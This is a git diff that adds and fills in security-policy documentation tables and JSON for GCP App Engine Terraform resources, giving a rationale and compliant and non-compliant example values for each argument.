| None | None | +| `min_idle_instances` | Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service. | false | false | To ensure the App Engine autoscaler can ingest performance metrics during traffic surges. | None | None | +| `min_total_instances` | Minimum number of running instances that should be maintained for this version. Default: 2 | false | false | To ensure of allowing the environment to fully de-provision resources during periods of zero activity. | None | None | +| `min_pending_latency` | Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it. | false | false | Optimal wait time before scaling is highly dependent on a specific workload | None | None | +| `request_utilization` | Target scaling by request utilization. Structure is [documented below](#nested_automatic_scaling_request_utilization). | false | false | Can be unreliable if request processing times vary whereas relying on CPU utilisation provides a more accurate measure of when an instance is actually working at its limit. | None | None | +| `disk_utilization` | Target scaling by disk usage. Structure is [documented below](#nested_automatic_scaling_disk_utilization). | false | false | Typically bottlenecked by CPU or memory rather than storage. | None | None | +| `network_utilization` | Target scaling by network usage. Structure is [documented below](#nested_automatic_scaling_network_utilization). | false | false | Scaling based on data throughput can be highly inconsistent while CPU-based scaling provides a more stable and accurate signal for when an instance is reaching its operational capacity. 
| None | None | + +### manual_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `instances` | Number of instances to assign to the service at the start. **Note:** When managing the number of instances at runtime through the App Engine Admin API or the (now deprecated) Python 2 Modules API set_num_instances() you must use `lifecycle.ignore_changes = ["manual_scaling"[0].instances]` to prevent drift detection. | true | false | None | None | None | + +### volumes Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Unique name for the volume. | true | false | None | None | None | +| `volume_type` | Underlying volume type, e.g. 'tmpfs'. | true | false | None | None | None | +| `size_gb` | Volume size in gigabytes. | true | false | None | None | None | + +### script Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `script_path` | Path to the script from the application root directory. | true | false | None | None | None | + +### static_files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | Path to the static files matched by the URL pattern, from the application root directory. The path can refer to text matched in groupings in the URL pattern. | false | false | None | None | None | +| `upload_path_regex` | Regular expression that matches the file paths for all files that should be referenced by this handler. 
| false | false | None | None | None | +| `http_headers` | HTTP headers to use for all responses from these URLs. An object containing a list of "key:value" value pairs.". | false | false | None | None | None | +| `mime_type` | MIME type used to serve all files served by this handler. Defaults to file-specific MIME types, which are derived from each file's filename extension. | false | false | None | None | None | +| `expiration` | Time a static file served by this handler should be cached by web proxies and browsers. A duration in seconds with up to nine fractional digits, terminated by 's'. Example "3.5s". Default is '0s' | false | false | None | None | None | +| `require_matching_file` | Whether this handler should match the request if the file referenced by the handler does not exist. | false | false | None | None | None | +| `application_readable` | Whether files should also be uploaded as code data. By default, files declared in static file handlers are uploaded as static data and are only served to end users; they cannot be read by the application. If enabled, uploads are charged against both your code and static data storage resource quotas. | false | false | None | None | None | + +### zip Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_url` | Source URL | true | true | To ensure that the application's source code is retrieved from a managed version-controlled repository, using an immutable path. 
| https://storage.googleapis.com/hardhat-bucket/hello-world.zip | invalid.com | +| `files_count` | files count | false | false | None | None | None | + +### files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | | false | false | None | None | None | +| `sha1_sum` | SHA1 checksum of the file | false | false | None | None | None | +| `source_url` | Source URL | true | false | None | None | None | + +### container Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `image` | URI to the hosted container image in Google Container Registry. The URI must be fully qualified and include a tag or digest. Examples: "gcr.io/my-project/image:tag" or "gcr.io/my-project/image@digest" | true | false | None | None | None | + +### cloud_build_options Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `app_yaml_path` | Path to the yaml file used in deployment, used to determine runtime configuration details. | true | false | None | None | None | +| `cloud_build_timeout` | The Cloud Build timeout used as part of any dependent builds performed by version creation. Defaults to 10 minutes. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". 
| false | false | None | None | None | + +### cpu_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `aggregation_window_length` | Period of time over which CPU utilization is calculated. | false | false | None | None | None | +| `target_utilization` | Target CPU utilization ratio to maintain when scaling. Must be between 0 and 1. | true | false | None | None | None | + +### request_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_request_count_per_second` | Target requests per second. | false | false | None | None | None | +| `target_concurrent_requests` | Target number of concurrent requests. | false | false | None | None | None | + +### disk_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_write_bytes_per_second` | Target bytes written per second. | false | false | None | None | None | +| `target_write_ops_per_second` | Target ops written per second. | false | false | None | None | None | +| `target_read_bytes_per_second` | Target bytes read per second. | false | false | None | None | None | +| `target_read_ops_per_second` | Target ops read per seconds. | false | false | None | None | None | + +### network_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_sent_bytes_per_second` | Target bytes sent per second. 
| false | false | None | None | None | +| `target_sent_packets_per_second` | Target packets sent per second. | false | false | None | None | None | +| `target_received_bytes_per_second` | Target bytes received per second. | false | false | None | None | None | +| `target_received_packets_per_second` | Target packets received per second. | false | false | None | None | None | diff --git a/docs/gcp/App_Engine/app_engine_service_network_settings.md b/docs/gcp/App_Engine/app_engine_service_network_settings.md new file mode 100644 index 000000000..2b0d34016 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_service_network_settings.md 
@@ -0,0 +1,21 @@ +## 🛡️ Policy Deployment Engine: `app_engine_service_network_settings` + +This section provides a concise policy evaluation for the `app_engine_service_network_settings` resource in GCP. + +Reference: [Terraform Registry – app_engine_service_network_settings](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_service_network_settings) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `service` | The name of the service these settings apply to. | true | true | Enforced to establish a verifiable network perimeter at the application layer. | app-internal-service | internal-service | +| `network_settings` | Ingress settings for this service. Will apply to all versions. Structure is [documented below](#nested_network_settings). | true | true | Enforced to ensure the definition of the fundamental trust boundary of the application | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | + +### network_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `ingress_traffic_allowed` | The ingress settings for version or service. Default value is `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`. Possible values are: `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`, `INGRESS_TRAFFIC_ALLOWED_ALL`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB`. | false | true | Is enforced to mitigate the risk of direct-to-origin attacks from occurring. By ensuring that the default unshielded App Engine URL is disabled. 
| INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY | INGRESS_TRAFFIC_ALLOWED_ALL | diff --git a/docs/gcp/App_Engine/app_engine_service_split_traffic.md b/docs/gcp/App_Engine/app_engine_service_split_traffic.md new file mode 100644 index 000000000..262c7a7a4 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_service_split_traffic.md 
@@ -0,0 +1,23 @@ +## 🛡️ Policy Deployment Engine: `app_engine_service_split_traffic` + +This section provides a concise policy evaluation for the `app_engine_service_split_traffic` resource in GCP. + +Reference: [Terraform Registry – app_engine_service_split_traffic](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_service_split_traffic) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `service` | The name of the service these settings apply to. | true | true | To ensure that traffic splitting configurations are explicitly mapped to the correct logical microservice. | hardhat-main-api | generic-api | +| `split` | Mapping that defines fractional HTTP traffic diversion to different versions within the service. Structure is [documented below](#nested_split). | true | true | To ensure that traffic distribution is managed as code and providing an automated way to transition users to new versions while maintaining a clear record of routing logic. | None | None | +| `migrate_traffic` | If set to true traffic will be migrated to this version. | false | true | Allowing to ensure the system to warm up new instances and preventing sudden latency spikes for users during a deployment. | false | true | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | + +### split Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shard_by` | Mechanism used to determine which version a request is sent to. The traffic selection algorithm will be stable for either type until allocations are changed. 
Possible values are: `UNSPECIFIED`, `COOKIE`, `IP`, `RANDOM`. | false | true | To define how traffic is distributed through versions, ensuring that users have a consistent experience by consistently routing them to the same version based on their IP address. | IP | RANDOM | +| `allocations` | Mapping from version IDs within the service to fractional (0.000, 1] allocations of traffic for that version. Each version can be specified only once, but some versions in the service may not have any traffic allocation. Services that have traffic allocated cannot be deleted until either the service is deleted or their traffic allocation is removed. Allocations must sum to 1. Up to two decimal place precision is supported for IP-based splits and up to three decimal places is supported for cookie-based splits. | true | true | Ensuring to provide precise control over the percentage of traffic directed to specific versions. | v1 = 0.8 v2 = 0.2 | v1 = 0.0 v2 = 1.0 | diff --git a/docs/gcp/App_Engine/app_engine_standard_app_version.md b/docs/gcp/App_Engine/app_engine_standard_app_version.md new file mode 100644 index 000000000..bd3e8d572 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_standard_app_version.md 
@@ -0,0 +1,143 @@ +## 🛡️ Policy Deployment Engine: `app_engine_standard_app_version` + +This section provides a concise policy evaluation for the `app_engine_standard_app_version` resource in GCP. + +Reference: [Terraform Registry – app_engine_standard_app_version](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_standard_app_version) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `runtime` | Desired runtime. Example python27. | true | true | Ensuring the application executes in the correct environment with the specific language version required for its dependencies. | nodejs20 | nodejs10 | +| `deployment` | Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment). | true | true | To define the specific source code and files that constitute the application version ensuring that Terraform can verify and upload the correct assets to the environment. | None | None | +| `entrypoint` | The entrypoint for the application. Structure is [documented below](#nested_entrypoint). | true | true | To provide the specific command required to start the application, ensuring that the environment knows how to execute the code, with which port/startup script to initialize. | None | None | +| `service` | AppEngine service resource | true | true | Ensuring the application is deployed as a specific microservice, allowing for independent scaling and routing logic within the larger App Engine project. | default | unauthorized-app-name | +| `version_id` | Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,"default", "latest", and any name with the prefix "ah-". 
| false | false | To automatically generate unique timestamp identifiers for each deployment, inturn preventing naming conflicts and ensuring that new releases do not accidentally overwrite existing versions. | None | None | +| `service_account` | The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag. | false | false | Having utilise the default App Engine service account, simplifying permission management by leveraging the standard identity provided by the platform for accessing Google Cloud resources. | None | None | +| `threadsafe` | Whether multiple requests can be dispatched to this version at once. | false | false | Environment to use its default concurrency settings, ensuring the application remains stable and avoids race conditions if the codebase is not optimized for parallel request handling. | None | None | +| `app_engine_apis` | Allows App Engine second generation runtimes to access the legacy bundled services. | false | false | To ensure the application remains modern and portable | None | None | +| `runtime_api_version` | The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`. | false | false | The application utilises a second-generation runtime where the API version is automatically managed by the platform, ensuring the environment always uses the most compatible interface without manual intervention. | None | None | +| `handlers` | An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers). 
| false | false | For a more flexible and unified approach to request handling without platform-specific configuration. | None | None | +| `libraries` | Configuration for third-party Python runtime libraries that are required by the application. Structure is [documented below](#nested_libraries). | false | false | Uses a second-generation runtime that manages dependencies through standard package managers. | None | None | +| `env_variables` | Environment variables available to the application. | false | false | Avoid hardcoding sensitive/environment-specific data in the deployment manifest. | None | None | +| `vpc_access_connector` | Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector). | false | false | interacts with public APIs/managed services that do not require a private connection to a Virtual Private Cloud which reduces infrastructure complexity. | None | None | +| `inbound_services` | A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`. | false | false | Does not require specialised App Engine-specific features, allowing it to remain a standard web service with a smaller configuration footprint. | None | None | +| `instance_class` | Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G BasicScaling or ManualScaling: B1, B2, B4, B4_1G, B8 Defaults to F1 for AutomaticScaling and B2 for ManualScaling and BasicScaling. If no scaling is specified, AutomaticScaling is chosen. | false | true | Defined to ensure the application has the specific CPU and memory resources required for its workload. 
| F1 | F2 | +| `automatic_scaling` | Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling). | false | false | To prevent the application from scaling up to aggressively during minor traffic fluctuations. | None | None | +| `basic_scaling` | Basic scaling creates instances when your application receives requests. Each instance will be shut down when the application becomes idle. Basic scaling is ideal for work that is intermittent or driven by user activity. Structure is [documented below](#nested_basic_scaling). | false | false | Avoid the latency delays in relation with starting instances from zero after periods of inactivity. | None | None | +| `manual_scaling` | A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling). | false | false | To ensure the system can instead respond dynamically to traffic changes without the risk of over-provisioning/service outages during unexpected load. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | +| `noop_on_destroy` | If set to true, the application version will not be deleted. | false | false | To ensure Terraform can fully decommission the application version. | None | None | +| `delete_service_on_destroy` | If set to true, the service will be deleted if it is the last version. | false | false | Prevent the accidental removal of the entire service and its versions when a specific version is decommissioned. | None | None | +| `zip` | Zip | false | true | Provides a direct way to package the application's source code. 
| None | None | +| `files` | | false | false | None | None | None | +| `script` | | false | false | None | None | None | +| `static_files` | | false | false | None | None | None | +| `standard_scheduler_settings` | | false | false | None | None | None | + +### deployment Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `zip` | Zip File Structure is [documented below](#nested_deployment_zip). | false | true | Provides a direct way to package the application's source code. | None | None | +| `files` | Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files). | false | false | To simplify the configuration and ensure that the application package is deployed as a single consistent unit rather than managing individual file paths manually. | None | None | + +### entrypoint Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shell` | The format should be a shell command that can be fed to bash -c. | true | true | To define the startup command, as it allows for the execution of complex scripts/multiple commands within the standard shell environment. | node ./app.js | bash ./app.js | + +### handlers Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `url_regex` | URL prefix. Uses regular expression syntax, which means regexp special characters must be escaped, but should not contain groupings. 
All URLs that begin with this prefix are handled by this handler, using the portion of the URL after the prefix as part of the file path. | false | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `login` | Methods to restrict access to a URL based on login status. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `auth_fail_action` | Actions to take when the user is not logged in. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `redirect_http_response_code` | 30x code to use when performing redirects for the secure field. Possible values are: `REDIRECT_HTTP_RESPONSE_CODE_301`, `REDIRECT_HTTP_RESPONSE_CODE_302`, `REDIRECT_HTTP_RESPONSE_CODE_303`, `REDIRECT_HTTP_RESPONSE_CODE_307`. | false | false | None | None | None | +| `script` | Executes a script to handle the requests that match this URL pattern. Only the auto value is supported for Node.js in the App Engine standard environment, for example "script:" "auto". Structure is [documented below](#nested_handlers_handlers_script). | false | false | None | None | None | +| `static_files` | Files served directly to the user for a given URL, such as images, CSS stylesheets, or JavaScript source files. Static file handlers describe which files in the application directory are static files, and which URLs serve them. Structure is [documented below](#nested_handlers_handlers_static_files). | false | false | None | None | None | + +### libraries Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Name of the library. Example "django". 
| false | false | None | None | None | +| `version` | Version of the library to select, or "latest". | false | false | None | None | None | + +### vpc_access_connector Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Full Serverless VPC Access Connector name e.g. /projects/my-project/locations/us-central1/connectors/c1. | true | false | None | None | None | +| `egress_setting` | The egress setting for the connector, controlling what traffic is diverted through it. | false | false | None | None | None | + +### automatic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `max_concurrent_requests` | Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value. | false | false | None | None | None | +| `max_idle_instances` | Maximum number of idle instances that should be maintained for this version. | false | false | None | None | None | +| `max_pending_latency` | Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". | false | false | None | None | None | +| `min_idle_instances` | Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service. | false | false | None | None | None | +| `min_pending_latency` | Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". 
| false | false | None | None | None | +| `standard_scheduler_settings` | Scheduler settings for standard environment. Structure is [documented below](#nested_automatic_scaling_standard_scheduler_settings). | false | false | None | None | None | + +### basic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `idle_timeout` | Duration of time after the last request that an instance must wait before the instance is shut down. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". Defaults to 900s. | false | false | None | None | None | +| `max_instances` | Maximum number of instances to create for this version. Must be in the range [1.0, 200.0]. | true | false | None | None | None | + +### manual_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `instances` | Number of instances to assign to the service at the start. **Note:** When managing the number of instances at runtime through the App Engine Admin API or the (now deprecated) Python 2 Modules API set_num_instances() you must use `lifecycle.ignore_changes = ["manual_scaling"[0].instances]` to prevent drift detection. | true | false | None | None | None | + +### zip Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_url` | Source URL | true | true | Ensuring that the deployment process uses a verified artifact that is consistent across all environments. 
| https://storage.googleapis.com/appengine-static-content/hello-world.zip | https://storage.googleapis.com/malicious-bucket/exploit.zip | +| `files_count` | files count | false | false | None | None | None | + +### files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | | false | false | None | None | None | +| `sha1_sum` | SHA1 checksum of the file | false | false | None | None | None | +| `source_url` | Source URL | true | false | None | None | None | + +### script Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `script_path` | Path to the script from the application root directory. | true | false | None | None | None | + +### static_files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | Path to the static files matched by the URL pattern, from the application root directory. The path can refer to text matched in groupings in the URL pattern. | false | false | None | None | None | +| `upload_path_regex` | Regular expression that matches the file paths for all files that should be referenced by this handler. | false | false | None | None | None | +| `http_headers` | HTTP headers to use for all responses from these URLs. An object containing a list of "key:value" value pairs.". | false | false | None | None | None | +| `mime_type` | MIME type used to serve all files served by this handler. Defaults to file-specific MIME types, which are derived from each file's filename extension. 
| false | false | None | None | None | +| `expiration` | Time a static file served by this handler should be cached by web proxies and browsers. A duration in seconds with up to nine fractional digits, terminated by 's'. Example "3.5s". | false | false | None | None | None | +| `require_matching_file` | Whether this handler should match the request if the file referenced by the handler does not exist. | false | false | None | None | None | +| `application_readable` | Whether files should also be uploaded as code data. By default, files declared in static file handlers are uploaded as static data and are only served to end users; they cannot be read by the application. If enabled, uploads are charged against both your code and static data storage resource quotas. | false | false | None | None | None | + +### standard_scheduler_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_cpu_utilization` | Target CPU utilization ratio to maintain when scaling. Should be a value in the range [0.50, 0.95], zero, or a negative value. | false | false | None | None | None | +| `target_throughput_utilization` | Target throughput utilization ratio to maintain when scaling. Should be a value in the range [0.50, 0.95], zero, or a negative value. | false | false | None | None | None | +| `min_instances` | Minimum number of instances to run for this version. Set to zero to disable minInstances configuration. | false | false | None | None | None | +| `max_instances` | Maximum number of instances to run for this version. Set to zero to disable maxInstances configuration. **Note:** Starting from March 2025, App Engine sets the maxInstances default for standard environment deployments to 20. This change doesn't impact existing apps. 
To override the default, specify a new value between 0 and 2147483647, and deploy a new version or redeploy over an existing version. To disable the maxInstances default configuration setting, specify the maximum permitted value 2147483647. | false | false | None | None | None | diff --git a/docs/gcp/App_Engine/resource_json/app_engine_application.json b/docs/gcp/App_Engine/resource_json/app_engine_application.json index f084e39a7..45df4c175 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_application.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_application.json 
@@ -4,92 +4,101 @@ "arguments": { "project": { "description": "~>**NOTE:** GCP only accepts project ID, not project number. If you are using number, you may get a \"Permission denied\" error.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "required": true, + "security_impact": true, + "rationale": "To enforce the use of Project IDs over Project Numbers to prevent API resolution failures and (Permission Denied) errors during deployment.", + "compliant": "gcp-project-12345", + "non-compliant": "123456789", "parent": null }, "location_id": { - "description": "to serve the app from.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "The location to serve the app from.", + "required": true, + "security_impact": true, + "rationale": "To esnure data residency compliance, prevents deployment to unauthorized regions, as App Engine locations cannot be changed once set.", + "compliant": "australia-southeast1", + "non-compliant": "europe-west1", "parent": null }, "auth_domain": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "The domain to authenticate users with when using App Engine's User API.", + "required": false, + "security_impact": false, + "rationale": "Modern identity management is handled via Identity-Aware Proxy IAP), making the legacy domain setting redundant for security enforcement.", "compliant": null, "non-compliant": null, "parent": null }, "database_type": { "description": "Can be `CLOUD_FIRESTORE` or `CLOUD_DATASTORE_COMPATIBILITY` for new instances. To support old instances, the value `CLOUD_DATASTORE` is accepted by the provider, but will be rejected by the API. 
To create a Cloud Firestore database without creating an App Engine application, use the [`google_firestore_database`](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/firestore_database) resource instead.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "required": false, + "security_impact": true, + "rationale": "To enforce the selection of Cloud Firestore so the application uses Google's latest scalable database technology with modern security and consistency features.", + "compliant": "CLOUD_FIRESTORE", + "non-compliant": "CLOUD_DATASTORE_COMPATIBILITY", "parent": null }, "serving_status": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "The serving status of the app.", + "required": false, + "security_impact": true, + "rationale": "Ensures applications are deployed in an active state and prevents accidental service outages caused by manual or uncoordinated status overrides.", + "compliant": "SERVING", + "non-compliant": "USER_DISABLED", "parent": null }, "feature_settings": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "A block of optional settings to configure specific App Engine features:", + "required": false, + "security_impact": true, + "rationale": "to enforce the use of modern split health checks to ensure precise monitoring of application readiness and liveness, replacing legacy combined health checks.", "compliant": null, "non-compliant": null, "parent": null }, "split_health_checks": { - "description": "and liveness checks.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, - "parent": null + "description": "Set to false to use the legacy health check instead of the readiness and liveness checks.", + "required": true, + 
"security_impact": true, + "rationale": "Enables the separation of readiness and liveness probes to improve deployment reliability and prevent traffic from being routed to instances that are still initializing.", + "compliant": "split_health_checks = true", + "non-compliant": "split_health_checks = false", + "parent": "feature_settings" }, "iap": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Settings for enabling Cloud Identity Aware Proxy", + "required": false, + "security_impact": true, + "rationale": "Enforces Identity-Aware Proxy to establish a Zero Trust security layer, ensuring that only authenticated and authorized users can access the application, regardless of network location.", "compliant": null, "non-compliant": null, "parent": null }, "oauth2_client_id": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, - "parent": null + "description": "OAuth2 client ID to use for the authentication flow.", + "required": true, + "security_impact": true, + "rationale": "Mandates a valid OAuth2 Client ID to securely link the IAP to the organization's identity provider, ensuring only verified corporate credentials can grant access.", + "compliant": "12345.apps.googleusercontent.com", + "non-compliant": "incorrect-id.apps.googleusercontent.com", + "parent": "iap" }, "oauth2_client_secret": { - "description": "The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "OAuth2 client secret to use for the authentication flow. 
The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.", + "required": true, + "security_impact": true, + "rationale": "Ensures the authenticity of the handshake between Google Cloud and the Identity Provider to prevent man-in-the-middle attacks/unauthorized identity spoofing.", + "compliant": "GOCSPX-abc123def456_actual_secret", + "non-compliant": "12345", + "parent": "iap" + }, + "ssl_policy": { + "description": "A list of the SSL policy that will be applied. Each block has a SSL_POLICY_UNSPECIFIED, DEFAULT, and MODERN field.", + "required": false, + "security_impact": true, + "rationale": "To enforce secure managed SSL certificates to ensure all data in transit is encrypted using modern protocols and to prevent service outages caused by manual certificate expiration.", + "compliant": "AUTOMATIC", + "non-compliant": "MANUAL", "parent": null } } diff --git a/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json b/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json index 020b45eb6..d0257f953 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json @@ -5,8 +5,8 @@ "dispatch_rules": { "description": "Rules to match an HTTP request and dispatch that request to a service. Structure is [documented below](#nested_dispatch_rules).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Establishes centralized routing logic to ensure requests are directed to the correct microservices based on URL patterns, preventing leaky traffic/unauthorized cross-service access.", "compliant": null, "non-compliant": null, "parent": null, 
